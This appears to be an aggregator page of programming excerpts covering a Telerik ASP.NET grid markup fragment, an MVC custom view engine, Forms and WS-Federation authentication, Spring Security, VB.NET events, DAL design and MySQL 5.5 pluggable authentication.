runat="server" AutoPostBack="true" OnCheckedChanged="cbxAllowDragAndDrop_CheckedChanged" /></td> <td width="1%" nowrap="nowrap"><asp:Label AssociatedControlID="cbxAllowDragAndDrop" ID="Label1" runat="server" Text="Enable Drag and Drop Reordering" ToolTip="Drag and Drop Reordering applies only to Forms." /></td> <td align="right" width="1%"><asp:Button ID="btnAddPacket" Text="Create New Packet" runat="server" CommandName="InitInsert" /></td> </tr> </table> </CommandItemTemplate> <EditFormSettings> <EditColumn ButtonType="PushButton" HeaderStyle-Font-Bold="true" UniqueName="EditCommandColumn" /> </EditFormSettings> <EditItemStyle Font-Bold="true" BackColor="#FFFFCC" /> <Columns> <telerik:GridTemplateColumn HeaderText="Packet Name" UniqueName="PacketName" SortExpression="Name"> <ItemTemplate> <img src="../Admin/Images/Packet2.png" align="absmiddle" width="16" height="16" />&nbsp;&nbsp;<%#Eval("Name")%> </ItemTemplate> <EditItemTemplate> <telerik:RadTextBox runat="server" ID="rtbName" Width="300" Text='<%# Bind("Name") %>' /> <asp:RequiredFieldValidator ID="rfvName" runat="server" ErrorMessage="Required" ControlToValidate="rtbName" /> </EditItemTemplate> </telerik:GridTemplateColumn> <telerik:GridTemplateColumn HeaderText="Tags" UniqueName="Tags"> <ItemTemplate> <%#DisplayTagList(Eval("RequestFormPacketTags"))%> </ItemTemplate> <EditItemTemplate> <asp:Panel ID="pnlAddTags" runat="server" DefaultButton="btnAddTag"> <table cellpadding="0" cellspacing="0"> <tr> <td> <telerik:RadTextBox ID="rtbTags" runat="server" Width="200" style="text-transform:uppercase;" /> <asp:RegularExpressionValidator ID="revTags" runat="server" ErrorMessage="Invalid Entry" ControlToValidate="rtbTags" Display="Dynamic" ValidationExpression="^[^<>`~!/@\#}$%:;)(_^{&*=|+]+$" ValidationGroup="vgTags" /> </td> <td> <asp:Button ID="btnAddTag" runat="server" ValidationGroup="vgTags" Text="Add" OnClick="btnAddTag_Click" /> </td> </tr> </table> </asp:Panel> <div id="divTags"> <asp:PlaceHolder id="plhTags" runat="server" /> <asp:HiddenField ID="hdnTags" runat="server" /> </div> </EditItemTemplate> </telerik:GridTemplateColumn> <telerik:GridTemplateColumn HeaderTooltip="Disable" ItemStyle-Width="1%" ItemStyle-HorizontalAlign="Center" SortExpression="IsActive" UniqueName="IsActive" ReadOnly="true"> <ItemTemplate> <asp:ImageButton ID="ibnDisabledProcess" runat="server" ImageUrl="../Images/Icons/Stop.png" Width="16" OnClientClick="return window.confirm('Activate this Process?');" ToolTip="Click to activate this Request for Account use." Visible='<%#IIF(Eval("IsActive"),false,true) %>' OnClick="ibnDisableToggleProcess_Click" /> <asp:ImageButton ID="ibnEnabledProcess" runat="server" ImageUrl="../Images/Icons/Stop_disabled.png" Width="16" OnClientClick="return window.confirm('Deactivate this Process?');" ToolTip="Click to deactivate this Request for Account use." Visible='<%#IIF(Eval("IsActive"),true,false) %>' OnClick="ibnDisableToggleProcess_Click" /> <asp:HiddenField ID="hdnDisableProcessID" runat="server" Value='<%#Eval("ID") %>' /> </ItemTemplate> </telerik:GridTemplateColumn> <telerik:GridTemplateColumn HeaderText="Is Active" UniqueName="IsActiveCheckbox" Display="false"> <EditItemTemplate> <asp:CheckBox ID="cbxIsActive" runat="server" Checked='<%# IIF(Eval("IsActive") Is DbNull.Value OrElse Eval("IsActive") = False,False,True) %>' /> </EditItemTemplate> </telerik:GridTemplateColumn> <telerik:GridEditCommandColumn ButtonType="ImageButton" EditText="Edit Admin" ItemStyle-Width="16" EditImageUrl="~/Images/edit-small.png" /> <telerik:GridButtonColumn ConfirmText="Do you really want to delete this Admin? WARNING: THIS CANNOT BE UNDONE!!" ConfirmDialogType="RadWindow" ConfirmTitle="Delete" ButtonType="ImageButton" CommandName="Delete" Text="Delete Admin" ImageUrl="~/Images/Delete.png" UniqueName="DeleteColumn"> <ItemStyle HorizontalAlign="Center" Width="16" /> </telerik:GridButtonColumn> </Columns> <DetailTables> <%-----------------------------------------------------------%> <%-------------------------- FORMS --------------------------%> <%-----------------------------------------------------------%> <telerik:GridTableView Name="gtvForms" AllowPaging="true" PagerStyle-Position="TopAndBottom" PageSize="20" AutoGenerateColumns="false" DataKeyNames="RequestFormPacketID,ID" runat="server" CommandItemDisplay="Top" Width="100%"> <ParentTableRelation> <telerik:GridRelationFields DetailKeyField="RequestFormPacketID" MasterKeyField="ID" /> </ParentTableRelation> <CommandItemTemplate> <table width="100%" class="AdminGridHeaders"> <tr> <td class="AdminGridHeaders"> &nbsp;<img src="../Admin/Images/Forms.png" align="absmiddle" width="16" height="16" />&nbsp;&nbsp;Forms </td> <td align="right"> <asp:Button ID="ibnAdd" runat="server" Text="Add Form" CommandName="InitInsert" /> </td> </tr> </table> </CommandItemTemplate> <EditFormSettings> <EditColumn ButtonType="PushButton" InsertText="Save" UpdateText="Update" CancelText="Cancel" /> </EditFormSettings> <EditItemStyle Font-Bold="true" BackColor="#FFFFCC" /> <Columns> <telerik:GridTemplateColumn HeaderText="Form Name" UniqueName="FormName"> <ItemTemplate> <img src="../Admin/Images/Forms.png" align="absmiddle" width="16" height="16" style="margin-right:4px;" /> <%#Eval("Form.Name")%> </ItemTemplate> <EditItemTemplate> <telerik:RadComboBox ID="rcbForms" runat="server" DataSourceID="odsForms" AppendDataBoundItems="true" DataTextField="Name" DataValueField="ID" SelectedValue='<%#Bind("FormID")%>'> <Items> <telerik:RadComboBoxItem Text="-- Select a Form --" Value="" /> </Items> </telerik:RadComboBox> <asp:RequiredFieldValidator ID="rfvForms" runat="server" ErrorMessage="Required" ControlToValidate="rcbForms" InitialValue="-- Select a Form --" Display="Dynamic" /> </EditItemTemplate> </telerik:GridTemplateColumn> <telerik:GridTemplateColumn HeaderText="Test" ReadOnly="true" UniqueName="TestForm" HeaderStyle-Width="1%" ItemStyle-HorizontalAlign="Center"> <ItemTemplate> <asp:HyperLink ID="hypTestForm" runat="server" NavigateUrl='<%# "FormsPreview.aspx?fid=" & Eval("FormID").ToString() & "&test=true" %>' Target="_blank"><asp:Image ID="imgTestProcess" runat="server" ImageUrl="~/Admin/Images/Test.png" ImageAlign="AbsMiddle" ToolTip="Test Form" /></asp:HyperLink> </ItemTemplate> </telerik:GridTemplateColumn> <telerik:GridTemplateColumn HeaderText="Header" SortExpression="Header" UniqueName="Header"> <ItemTemplate> <%#Eval("Form.Header")%>&nbsp; </ItemTemplate> </telerik:GridTemplateColumn> <telerik:GridTemplateColumn ReadOnly="true" ItemStyle-HorizontalAlign="Center" HeaderStyle-Width="1%" HeaderStyle-Wrap="false" ItemStyle-Wrap="false" UniqueName="SortOrder"> <ItemTemplate> <asp:ImageButton ID="ibnItemUpArrow" runat="server" Width="16" height="16" ImageUrl="~/Admin/Images/ArrowUp.png" ImageAlign="AbsMiddle" Visible='<%#IIF(Eval("SortOrder") = 0,false,true) %>' CommandArgument='<%#Eval("ID") %>' OnCommand=

    Read the article

  • A Custom View Engine with Dynamic View Location

    - by imran_ku07
        Introduction:          One of the nice feature of ASP.NET MVC framework is its pluggability. This means you can completely replace the default view engine(s) with a custom one. One of the reason for using a custom view engine is to change the default views location and sometimes you need to change the views location at run-time. For doing this, you can extend the default view engine(s) and then change the default views location variables at run-time.  But, you cannot directly change the default views location variables at run-time because they are static and shared among all requests. In this article, I will show you how you can dynamically change the views location without changing the default views location variables at run-time.       Description:           Let's say you need to synchronize the views location with controller name and controller namespace. So, instead of searching to the default views location(Views/ControllerName/ViewName) to locate views, this(these) custom view engine(s) will search in the Views/ControllerNameSpace/ControllerName/ViewName folder to locate views.           First of all create a sample ASP.NET MVC 3 application and then add these custom view engines to your application,   public class MyRazorViewEngine : RazorViewEngine { public MyRazorViewEngine() : base() { AreaViewLocationFormats = new[] { "~/Areas/{2}/Views/%1/{1}/{0}.cshtml", "~/Areas/{2}/Views/%1/{1}/{0}.vbhtml", "~/Areas/{2}/Views/%1/Shared/{0}.cshtml", "~/Areas/{2}/Views/%1/Shared/{0}.vbhtml" }; AreaMasterLocationFormats = new[] { "~/Areas/{2}/Views/%1/{1}/{0}.cshtml", "~/Areas/{2}/Views/%1/{1}/{0}.vbhtml", "~/Areas/{2}/Views/%1/Shared/{0}.cshtml", "~/Areas/{2}/Views/%1/Shared/{0}.vbhtml" }; AreaPartialViewLocationFormats = new[] { "~/Areas/{2}/Views/%1/{1}/{0}.cshtml", "~/Areas/{2}/Views/%1/{1}/{0}.vbhtml", "~/Areas/{2}/Views/%1/Shared/{0}.cshtml", "~/Areas/{2}/Views/%1/Shared/{0}.vbhtml" }; ViewLocationFormats = new[] { "~/Views/%1/{1}/{0}.cshtml", "~/Views/%1/{1}/{0}.vbhtml", "~/Views/%1/Shared/{0}.cshtml", "~/Views/%1/Shared/{0}.vbhtml" }; MasterLocationFormats = new[] { "~/Views/%1/{1}/{0}.cshtml", "~/Views/%1/{1}/{0}.vbhtml", "~/Views/%1/Shared/{0}.cshtml", "~/Views/%1/Shared/{0}.vbhtml" }; PartialViewLocationFormats = new[] { "~/Views/%1/{1}/{0}.cshtml", "~/Views/%1/{1}/{0}.vbhtml", "~/Views/%1/Shared/{0}.cshtml", "~/Views/%1/Shared/{0}.vbhtml" }; } protected override IView CreatePartialView(ControllerContext controllerContext, string partialPath) { var nameSpace = controllerContext.Controller.GetType().Namespace; return base.CreatePartialView(controllerContext, partialPath.Replace("%1", nameSpace)); } protected override IView CreateView(ControllerContext controllerContext, string viewPath, string masterPath) { var nameSpace = controllerContext.Controller.GetType().Namespace; return base.CreateView(controllerContext, viewPath.Replace("%1", nameSpace), masterPath.Replace("%1", nameSpace)); } protected override bool FileExists(ControllerContext controllerContext, string virtualPath) { var nameSpace = controllerContext.Controller.GetType().Namespace; return base.FileExists(controllerContext, virtualPath.Replace("%1", nameSpace)); } } public class MyWebFormViewEngine : WebFormViewEngine { public MyWebFormViewEngine() : base() { MasterLocationFormats = new[] { "~/Views/%1/{1}/{0}.master", "~/Views/%1/Shared/{0}.master" }; AreaMasterLocationFormats = new[] { "~/Areas/{2}/Views/%1/{1}/{0}.master", "~/Areas/{2}/Views/%1/Shared/{0}.master", }; ViewLocationFormats = new[] { "~/Views/%1/{1}/{0}.aspx", "~/Views/%1/{1}/{0}.ascx", "~/Views/%1/Shared/{0}.aspx", "~/Views/%1/Shared/{0}.ascx" }; AreaViewLocationFormats = new[] { "~/Areas/{2}/Views/%1/{1}/{0}.aspx", "~/Areas/{2}/Views/%1/{1}/{0}.ascx", "~/Areas/{2}/Views/%1/Shared/{0}.aspx", "~/Areas/{2}/Views/%1/Shared/{0}.ascx", }; PartialViewLocationFormats = ViewLocationFormats; AreaPartialViewLocationFormats = AreaViewLocationFormats; } protected override IView CreatePartialView(ControllerContext controllerContext, string partialPath) { var nameSpace = controllerContext.Controller.GetType().Namespace; return base.CreatePartialView(controllerContext, partialPath.Replace("%1", nameSpace)); } protected override IView CreateView(ControllerContext controllerContext, string viewPath, string masterPath) { var nameSpace = controllerContext.Controller.GetType().Namespace; return base.CreateView(controllerContext, viewPath.Replace("%1", nameSpace), masterPath.Replace("%1", nameSpace)); } protected override bool FileExists(ControllerContext controllerContext, string virtualPath) { var nameSpace = controllerContext.Controller.GetType().Namespace; return base.FileExists(controllerContext, virtualPath.Replace("%1", nameSpace)); } }             Here, I am extending the RazorViewEngine and WebFormViewEngine class and then appending /%1 in each views location variable, so that we can replace /%1 at run-time. I am also overriding the FileExists, CreateView and CreatePartialView methods. In each of these method implementation, I am replacing /%1 with controller namespace. Now, just register these view engines in Application_Start method in Global.asax.cs file,   protected void Application_Start() { ViewEngines.Engines.Clear(); ViewEngines.Engines.Add(new MyRazorViewEngine()); ViewEngines.Engines.Add(new MyWebFormViewEngine()); ................................................ ................................................ }             Now just create a controller and put this controller's view inside Views/ControllerNameSpace/ControllerName folder and then run this application. You will find that everything works just fine.       Summary:          ASP.NET MVC uses convention over configuration to locate views. For many applications this convention to locate views is acceptable. But sometimes you may need to locate views at run-time. In this article, I showed you how you can dynamically locate your views by using a custom view engine. I am also attaching a sample application. Hopefully you will enjoy this article too. SyntaxHighlighter.all()  

    Read the article

  • Mixing Forms and Token Authentication in a single ASP.NET Application (the Details)

    - by Your DisplayName here!
    The scenario described in my last post works because of the design around HTTP modules in ASP.NET. Authentication related modules (like Forms authentication and WIF WS-Fed/Sessions) typically subscribe to three events in the pipeline – AuthenticateRequest/PostAuthenticateRequest for pre-processing and EndRequest for post-processing (like making redirects to a login page). In the pre-processing stage it is the modules’ job to determine the identity of the client based on incoming HTTP details (like a header, cookie, form post) and set HttpContext.User and Thread.CurrentPrincipal. The actual page (in the ExecuteHandler event) “sees” the identity that the last module has set. So in our case there are three modules in effect: FormsAuthenticationModule (AuthenticateRequest, EndRequest) WSFederationAuthenticationModule (AuthenticateRequest, PostAuthenticateRequest, EndRequest) SessionAuthenticationModule (AuthenticateRequest, PostAuthenticateRequest) So let’s have a look at the different scenario we have when mixing Forms auth and WS-Federation. Anoymous request to unprotected resource This is the easiest case. Since there is no WIF session cookie or a FormsAuth cookie, these modules do nothing. The WSFed module creates an anonymous ClaimsPrincipal and calls the registered ClaimsAuthenticationManager (if any) to transform it. The result (by default an anonymous ClaimsPrincipal) gets set. Anonymous request to FormsAuth protected resource This is the scenario where an anonymous user tries to access a FormsAuth protected resource for the first time. The principal is anonymous and before the page gets rendered, the Authorize attribute kicks in. The attribute determines that the user needs authentication and therefor sets a 401 status code and ends the request. Now execution jumps to the EndRequest event, where the FormsAuth module takes over. The module then converts the 401 to a redirect (302) to the forms login page. If authentication is successful, the login page sets the FormsAuth cookie.   FormsAuth authenticated request to a FormsAuth protected resource Now a FormsAuth cookie is present, which gets validated by the FormsAuth module. This cookie gets turned into a GenericPrincipal/FormsIdentity combination. The WS-Fed module turns the principal into a ClaimsPrincipal and calls the registered ClaimsAuthenticationManager. The outcome of that gets set on the context. Anonymous request to STS protected resource This time the anonymous user tries to access an STS protected resource (a controller decorated with the RequireTokenAuthentication attribute). The attribute determines that the user needs STS authentication by checking the authentication type on the current principal. If this is not Federation, the redirect to the STS will be made. After successful authentication at the STS, the STS posts the token back to the application (using WS-Federation syntax). Postback from STS authentication After the postback, the WS-Fed module finds the token response and validates the contained token. If successful, the token gets transformed by the ClaimsAuthenticationManager, and the outcome is a) stored in a session cookie, and b) set on the context. STS authenticated request to an STS protected resource This time the WIF Session authentication module kicks in because it can find the previously issued session cookie. The module re-hydrates the ClaimsPrincipal from the cookie and sets it.     FormsAuth and STS authenticated request to a protected resource This is kind of an odd case – e.g. the user first authenticated using Forms and after that using the STS. This time the FormsAuth module does its work, and then afterwards the session module stomps over the context with the session principal. In other words, the STS identity wins.   What about roles? A common way to set roles in ASP.NET is to use the role manager feature. There is a corresponding HTTP module for that (RoleManagerModule) that handles PostAuthenticateRequest. Does this collide with the above combinations? No it doesn’t! When the WS-Fed module turns existing principals into a ClaimsPrincipal (like it did with the FormsIdentity), it also checks for RolePrincipal (which is the principal type created by role manager), and turns the roles in role claims. Nice! But as you can see in the last scenario above, this might result in unnecessary work, so I would rather recommend consolidating all role work (and other claims transformations) into the ClaimsAuthenticationManager. In there you can check for the authentication type of the incoming principal and act accordingly. HTH

    Read the article

  • C# Open Source software that is useful for learning Design Patterns

    - by Fathom Savvy
    In college I took a class in Expert Systems. The language the book taught (CLIPS) was esoteric - Expert Systems: Principles and Programming, Fourth Edition. I remember having a tough time with it. So, after almost failing the class, I needed to create the most awesome Expert System for my final presentation. I chose to create an expert system that would calculate risk analysis for a person's retirement portfolio. In short, the system would provide the services normally performed by one's financial adviser. In other words, based on personality, age, state of the macro economy, and other factors, should one's portfolio be conservative, moderate, or aggressive? In the appendix of the book (or on the CD-ROM), there was this in-depth example program for something unrelated to my presentation. Over my break, I read and re-read every line of that program until I understood it to the letter. Even though it was unrelated, I learned more than I ever could by reading all of the chapters. My presentation turned out to be pretty damn good and I received praises from my professor and classmates. So, the moral of the story is..., by understanding other people's code, you can gain greater insight into a language/paradigm than by reading canonical examples. Still, to this day, I am having trouble with everyday design patterns such as the Factory Pattern. I would like to know if anyone could recommend open source software that would help me understand the Gang of Four design patterns, at the very least. I have read the books, but I'm having trouble writing code for the concepts in the real world. Perhaps, by studying code used in today's real world applications, it might just "click". I realize a piece of software may only implement one kind of design pattern. But, if the pattern is an implementation you think is good for learning, and you know what pattern to look for within the source, I'm hoping you can tell me about it. For example, the System.Linq.Expressions namespace has a good example of the Visitor Pattern. The client calls Expression.Accept(new ExpressionVisitor()), which calls ExpressionVisitor (VisitExtension), which calls back to Expression (VisitChildren), which then calls Expression (Accept) again - wooah, kinda convoluted. The point to note here is that VisitChildren is a virtual method. Both Expression and those classes derived from Expression can implement the VisitChildren method any way they want. This means that one type of Expression can run code that is completely different from another type of derived Expression, even though the ExpressionVisitor class is the same in the Accept method. (As a side note Expression.Accept is also virtual). In the end, the code provides a real world example that you won't get in any book because it's kinda confusing. To summarize, If you know of any open source software that uses a design pattern implementation you were impressed by, please list it here. I'm sure it will help many others besides just me. public class VisitorPatternTest { public void Main() { Expression normalExpr = new Expression(); normalExpr.Accept(new ExpressionVisitor()); Expression binExpr = new BinaryExpression(); binExpr.Accept(new ExpressionVisitor()); } } public class Expression { protected internal virtual Expression Accept(ExpressionVisitor visitor) { return visitor.VisitExtension(this); } protected internal virtual Expression VisitChildren(ExpressionVisitor visitor) { if (!this.CanReduce) { throw Error.MustBeReducible(); } return visitor.Visit(this.ReduceAndCheck()); } public virtual Expression Visit(Expression node) { if (node != null) { return node.Accept(this); } return null; } public Expression ReduceAndCheck() { if (!this.CanReduce) { throw Error.MustBeReducible(); } Expression expression = this.Reduce(); if ((expression == null) || (expression == this)) { throw Error.MustReduceToDifferent(); } if (!TypeUtils.AreReferenceAssignable(this.Type, expression.Type)) { throw Error.ReducedNotCompatible(); } return expression; } } public class BinaryExpression : Expression { protected internal override Expression Accept(ExpressionVisitor visitor) { return visitor.VisitBinary(this); } protected internal override Expression VisitChildren(ExpressionVisitor visitor) { return CreateDummyExpression(); } protected internal Expression CreateDummyExpression() { Expression dummy = new Expression(); return dummy; } } public class ExpressionVisitor { public virtual Expression Visit(Expression node) { if (node != null) { return node.Accept(this); } return null; } protected internal virtual Expression VisitExtension(Expression node) { return node.VisitChildren(this); } protected internal virtual Expression VisitBinary(BinaryExpression node) { return ValidateBinary(node, node.Update(this.Visit(node.Left), this.VisitAndConvert<LambdaExpression>(node.Conversion, "VisitBinary"), this.Visit(node.Right))); } }

    Read the article

  • Is a base class with shared fields and functions good design

    - by eych
    I've got a BaseDataClass with shared fields and functions Protected Shared dbase as SqlDatabase Protected Shared dbCommand as DBCommand ... //also have a sync object used by the derived classes for Synclock'ing Protected Shared ReadOnly syncObj As Object = New Object() Protected Shared Sub Init() //initializes fields, sets connections Protected Shared Sub CleanAll() //closes connections, disposes, etc. I have several classes that derive from this base class. The derived classes have all Shared functions that can be called directly from the BLL with no instantiation. The functions in these derived classes call the base Init(), call their specific stored procs, call the base CleanAll() and then return the results. So if I have 5 derived classes with 10 functions each, totaling 50 possible function calls, since they are all Shared, the CLR only calls one at a time, right? All calls are queued to wait until each Shared function completes. Is there a better design with having Shared functions in your DAL and still have base class functions? Or since I have a base class, is it better to move towards instance methods within the DAL?

    Read the article

  • WithEvents LinkedList is it Impossible?

    - by serhio
    What is the optimal approach to a WithEvents Collection - VB.NET? Have you any remarks on the code bellow (skipping the Nothing verifications)? The problem is when I obtain the LinkedListNode(Of Foo) in a For Each block I can set myNode.Value = something, and here is a handlers leak... -Could I override the FooCollection's GetEnumerator in this case? -No. :( cause NotInheritable Class LinkedListNode(Of T) Class Foo Public Event SelectedChanged As EventHandler End Class Class FooCollection Inherits LinkedList(Of Foo) Public Event SelectedChanged As EventHandler Protected Overloads Sub AddFirst(ByVal item As Foo) AddHandler item.SelectedChanged, AddressOf OnSelectedChanged MyBase.AddFirst(item) End Sub Protected Overloads Sub AddLast(ByVal item As Foo) AddHandler item.SelectedChanged, AddressOf OnSelectedChanged MyBase.AddLast(item) End Sub ' ------------------- ' Protected Overloads Sub RemoveFirst() RemoveHandler MyBase.First.Value.SelectedChanged, _ AddressOf OnSelectedChanged MyBase.RemoveFirst() End Sub Protected Overloads Sub RemoveLast(ByVal item As Foo) RemoveHandler MyBase.Last.Value.SelectedChanged, _ AddressOf OnSelectedChanged MyBase.RemoveLast() End Sub ' ------------------- ' Protected Sub OnSelectedChanged(ByVal sender As Object, ByVal e As EventArgs) RaiseEvent SelectedChanged(sender, e) End Sub End Class

    Read the article

  • Spring security - Reach users ID without passing it through every controller

    - by nilsi
    I have a design issue that I don't know how to solve. I'm using Spring 3.2.4 and Spring security 3.1.4. I have a Account table in my database that looks like this: create table Account (id identity, username varchar unique, password varchar not null, firstName varchar not null, lastName varchar not null, university varchar not null, primary key (id)); Until recently my username was just only a username but I changed it to be the email address instead since many users want to login with that instead. I have a header that I include on all my pages which got a link to the users profile like this: <a href="/project/users/<%= request.getUserPrincipal().getName()%>" class="navbar-link"><strong><%= request.getUserPrincipal().getName()%></strong></a> The problem is that <%= request.getUserPrincipal().getName()%> returns the email now, I don't want to link the user's with thier emails. Instead I want to use the id every user have to link to the profile. How do I reach the users id's from every page? I have been thinking of two solutions but I'm not sure: Change the principal to contain the id as well, don't know how to do this and having problem finding good information on the topic. Add a model attribute to all my controllers that contain the whole user but this would be really ugly, like this. Account account = entityManager.find(Account.class, email); model.addAttribute("account", account); There are more way's as well and I have no clue which one is to prefer. I hope it's clear enough and thank you for any help on this. ====== Edit according to answer ======= I edited Account to implement UserDetails, it now looks like this (will fix the auto generated stuff later): @Entity @Table(name="Account") public class Account implements UserDetails { @Id private int id; private String username; private String password; private String firstName; private String lastName; @ManyToOne private University university; public Account() { } public Account(String username, String password, String firstName, String lastName, University university) { this.username = username; this.password = password; this.firstName = firstName; this.lastName = lastName; this.university = university; } public String getUsername() { return username; } public String getPassword() { return password; } public String getFirstName() { return firstName; } public String getLastName() { return lastName; } public void setUsername(String username) { this.username = username; } public void setPassword(String password) { this.password = password; } public void setFirstName(String firstName) { this.firstName = firstName; } public void setLastName(String lastName) { this.lastName = lastName; } public University getUniversity() { return university; } public void setUniversity(University university) { this.university = university; } public int getId() { return id; } public void setId(int id) { this.id = id; } @Override public Collection<? extends GrantedAuthority> getAuthorities() { // TODO Auto-generated method stub return null; } @Override public boolean isAccountNonExpired() { // TODO Auto-generated method stub return false; } @Override public boolean isAccountNonLocked() { // TODO Auto-generated method stub return false; } @Override public boolean isCredentialsNonExpired() { // TODO Auto-generated method stub return false; } @Override public boolean isEnabled() { // TODO Auto-generated method stub return true; } } I also added <%@ taglib prefix="sec" uri="http://www.springframework.org/security/tags" %> To my jsp files and trying to reach the id by <sec:authentication property="principal.id" /> This gives me the following org.springframework.beans.NotReadablePropertyException: Invalid property 'principal.id' of bean class [org.springframework.security.authentication.UsernamePasswordAuthenticationToken]: Bean property 'principal.id' is not readable or has an invalid getter method: Does the return type of the getter match the parameter type of the setter? ====== Edit 2 according to answer ======= I based my application on spring social samples and I never had to change anything until now. This are the files I think are relevant, please tell me if theres something you need to see besides this. AccountRepository.java public interface AccountRepository { void createAccount(Account account) throws UsernameAlreadyInUseException; Account findAccountByUsername(String username); } JdbcAccountRepository.java @Repository public class JdbcAccountRepository implements AccountRepository { private final JdbcTemplate jdbcTemplate; private final PasswordEncoder passwordEncoder; @Inject public JdbcAccountRepository(JdbcTemplate jdbcTemplate, PasswordEncoder passwordEncoder) { this.jdbcTemplate = jdbcTemplate; this.passwordEncoder = passwordEncoder; } @Transactional public void createAccount(Account user) throws UsernameAlreadyInUseException { try { jdbcTemplate.update( "insert into Account (firstName, lastName, username, university, password) values (?, ?, ?, ?, ?)", user.getFirstName(), user.getLastName(), user.getUsername(), user.getUniversity(), passwordEncoder.encode(user.getPassword())); } catch (DuplicateKeyException e) { throw new UsernameAlreadyInUseException(user.getUsername()); } } public Account findAccountByUsername(String username) { return jdbcTemplate.queryForObject("select username, firstName, lastName, university from Account where username = ?", new RowMapper<Account>() { public Account mapRow(ResultSet rs, int rowNum) throws SQLException { return new Account(rs.getString("username"), null, rs.getString("firstName"), rs.getString("lastName"), new University("test")); } }, username); } } security.xml <?xml version="1.0" encoding="UTF-8"?> <beans:beans xmlns="http://www.springframework.org/schema/security" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:beans="http://www.springframework.org/schema/beans" xsi:schemaLocation="http://www.springframework.org/schema/security http://www.springframework.org/schema/security/spring-security-3.1.xsd http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.1.xsd"> <http pattern="/resources/**" security="none" /> <http pattern="/project/" security="none" /> <http use-expressions="true"> <!-- Authentication policy --> <form-login login-page="/signin" login-processing-url="/signin/authenticate" authentication-failure-url="/signin?error=bad_credentials" /> <logout logout-url="/signout" delete-cookies="JSESSIONID" /> <intercept-url pattern="/addcourse" access="isAuthenticated()" /> <intercept-url pattern="/courses/**/**/edit" access="isAuthenticated()" /> <intercept-url pattern="/users/**/edit" access="isAuthenticated()" /> </http> <authentication-manager alias="authenticationManager"> <authentication-provider> <password-encoder ref="passwordEncoder" /> <jdbc-user-service data-source-ref="dataSource" users-by-username-query="select username, password, true from Account where username = ?" authorities-by-username-query="select username, 'ROLE_USER' from Account where username = ?"/> </authentication-provider> <authentication-provider> <user-service> <user name="admin" password="admin" authorities="ROLE_USER, ROLE_ADMIN" /> </user-service> </authentication-provider> </authentication-manager> </beans:beans> And this is my try of implementing a UserDetailsService public class RepositoryUserDetailsService implements UserDetailsService { private final AccountRepository accountRepository; @Autowired public RepositoryUserDetailsService(AccountRepository repository) { this.accountRepository = repository; } @Override public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException { Account user = accountRepository.findAccountByUsername(username); if (user == null) { throw new UsernameNotFoundException("No user found with username: " + username); } return user; } } Still gives me the same error, do I need to add the UserDetailsService somewhere? This is starting to be something else compared to my initial question, I should maybe start another question. Sorry for my lack of experience in this. I have to read up.

    Read the article

  • MySQL 5.5 brings in new ways to authenticate users

    - by Georgi Kodinov
    Ever wanted to use your server's OS for authenticating MySQL users ? Or the corporate LDAP repository ? Unfortunately options like the above are plentiful nowadays. And providing hard-coded support for protocol X or service Y is not the best possible idea. MySQL 5.5 has taken the step into the right direction by providing an infrastructure allowing one to make the server understand different authentication protocols by creating a set of simple plugins (one for the client and one for the server). So now you can easily extend MySQL to search for and authenticate users in your favorite user directory. In fact the API supplied is so versatile that we took the possibility to re-design the current "native" authentication mechanism into a built-in always-on plugin ! OK, let me give you an example: Imagine we have a bunch of users defined in your OS, e.g. we have a user joro with his respective password. And we have a MySQL instance running on the same computer. It would not be unexpected to need to let joro access and/or modify MySQL data. The first step is to define him as a MySQL user. And there's a problem right there : MySQL's CREATE USER joro@localhost IDENTIFIED BY 'joros_password' statement needs a password. And this is a password in no way related to the password that joro have set up in the OS. What's worse : if joro changes his OS password this will in no way be reflected in MySQL. So he'll need to change his MySQL password in a separate step. Not very convenient, specially when you have a lot of users. This is a laborious setup for joro's DBA as well : he'll have to disable his access in both MySQL and the OS should he decides that joro's out of the "nice" list. Now mysql 5.5 to the rescue: Imagine that the smart DBA has created a MySQL server plugin that will check if the name of the user logging in is a valid and enabled OS name and if the password supplied to the mysql client matches the OS and has called this plugin 'auth_os'. Now all that's left to do is to define joro as a MySQL user that will be authenticated externally. This is done by the following command : CREATE USER 'joro'@'localhost' IDENTIFIED WITH 'auth_os'; Now joro can login to MySQL using his current OS password. Note : joro is still a valid MySQL user, so you can grant privileges to him just like you would for all other users. What's better: you can have users that authenticate using different mechanisms in the same server. So you can e.g. safely experiment with external authentication for selected users while keeping your current user base operational. What happens under the hood when joro logs in ? The server will find out by the user definition that it needs to use a non-default authentication and will ask the client to "switch" to using the appropriate client-side plugin (if of course the client is not already using it). If the client can't do this (e.g. because it's an old client or doesn't have the necessary plugin available) the server will reject the login. Otherwise the server will let the server-side plugin decide (while possibly talking to the client side plugin and the OS user directory) if this is a valid login or not. If it is the login process will continue as usual, while if it's not the login will get rejected. There's a lot more that MySQL 5.5 can do for you than just the simple case above. Stay tuned for more advanced use cases like mapping groups of external users to a single MySQL user (so you won't have to have 1-to-1 mapping between your external user directory and your mysql user repository) or ways to control the process as a DBA. Or you can simply skip ahead and read the relevant topics from MySQL's excellent online documentation. Or take a look at the example plugins in plugin/auth. Or take a look at the test suite in mysql-test/t/plugin_auth.test. Changelog entry: http://dev.mysql.com/doc/refman/5.5/en/news-5-5-7.html Primary new sections: Pluggable authentication Proxy users Client plugin C API functions Revised sections: New PROXY privilege New proxies_priv grant table Passwords might be external New external_user and proxy_user system variables New --default-auth and --plugin-dir mysql options New MYSQL_DEFAULT_AUTH and MYSQL_PLUGIN_DIR options for mysql_options() CREATE USER has IDENTIFIED WITH clause to specify auth plugin GRANT has PROXY privilege, IDENTIFIED WITH clause to specify auth plugin The data structure for writing client plugins

    Read the article

  • 8 Mac System Features You Can Access in Recovery Mode

    - by Chris Hoffman
